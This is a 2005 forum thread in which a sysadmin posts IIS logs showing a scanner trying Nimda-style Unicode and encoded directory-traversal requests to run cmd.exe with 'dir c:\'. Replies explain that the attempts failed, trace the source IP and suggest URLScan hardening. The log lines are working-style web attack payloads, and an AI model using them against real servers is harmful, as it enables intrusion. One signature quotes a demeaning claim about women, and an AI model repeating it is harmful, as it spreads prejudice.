|
-
December 5th, 2005, 07:13 AM
#1
Junior Member
IIS Log - Is somebody trying to Hack my website
Hi,
I am Sys Admin for a web site. I was going thru the IIS LOgs and found the following entries in the Logs files
2005-11-28 01:27:45 80.117.251.32 - 10.100.1.125 80 HEAD /index.html - 200 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /MSADC/root.exe /c+dir+c:\ 403 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:27:51 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:27:56 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:03 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:04 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:12 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:26 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:27 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:29 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:13 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:29:38 80.117.251.32 - 10.100.1.125 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:55 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:57 80.117.251.32 - 10.100.1.125 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:19 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:44 80.117.251.32 - 10.100.1.125 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:46 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:35 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:45 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:56 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:15 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:18 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:33:43 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:33:44 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:34:09 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:11 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:42 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:47 80.117.251.32 - 10.100.1.125 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:34:48 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:35:10 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:12 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:16 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:41 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:43 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:12 203.201.214.129 - 10.100.1.125 443 GET /index.html - 200 IPCHECK+4+www.paessler.com
2005-11-28 01:36:28 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:30 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:31 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á�..Á�..Á�..Á�winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:35 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:36 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:47 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:48 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:49 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á�../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:59 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:37:24 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:37:26 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:38:30 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:38:52 80.117.251.32 - 10.100.1.125 80
HEAD /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
I think somebody is trying to hack into the system. Need help.
Regards,
Vishwas
-
December 5th, 2005, 11:35 AM
#2
No worry... Automated tool... the result codes indicate it failed.....
Relax and crack as cold one....
Don\'t SYN us.... We\'ll SYN you..... 
\"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides
-
December 5th, 2005, 12:13 PM
#3
I think Tiger is right...
For your information.. the tool is trying to abuse MS00-078...
It uses the same vulnerabilities as the Nimda worm..
Oliver's Law:
Experience is something you don't get until just after you need it.
-
December 5th, 2005, 12:31 PM
#4
Here's where the attack likely came from:
inetnum: 80.117.0.0 - 80.117.255.255
netname: TINIT-ADSL-LITE
descr: Telecom Italia S.p.A. TIN EASY LITE
country: IT
admin-c: BS104-RIPE
tech-c: BS104-RIPE
status: ASSIGNED PA
remarks: ##########################################
remarks: Pay attention
remarks: Any communication sent to email different
remarks: from the following will be ignored!
remarks: Any abuse reports, please send them to
remarks: abuse@retail.telecomitalia.it
remarks: ##########################################
mnt-by: TIWS-MNT
source: RIPE # Filtered
person: BBBEASYIP STAFF
address:
address: Via Val Cannuta, 250
address: I-00100 Roma
address: Italy
phone: +39 06 36881
e-mail: ripe-staff@telecomitalia.it
nic-hdl: BS104-RIPE
source: RIPE # Filtered
% Information related to '80.117.0.0/16AS3269'
route: 80.117.0.0/16
descr: INTERBUSINESS
origin: AS3269
mnt-by: INTERB-MNT
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
December 5th, 2005, 01:00 PM
#5
Junior Member
thnks a lot buddy..now i can sleep peacefully.....
-
December 6th, 2005, 05:00 AM
#6
IIS Log - Is somebody trying to Hack my website
Yes. Some attacker with his "fancy" scanner
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
That is what it looks like to me. 
-
December 6th, 2005, 05:16 AM
#7
Yeah, the Italian is walking through a sequence of attempts to use the nimda backdoor to your IIS. Based on the speed of the hits, I guess the kiddie is using a script. If you've run the URLScan tool, you should be rejecting these safely. If not, you might want to take a look at your IIS hardening, just to be sure.
-
December 6th, 2005, 06:04 AM
#8
the unicode directory transversal...it's really sad but he'll probably find a few vulnerable servers.
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote
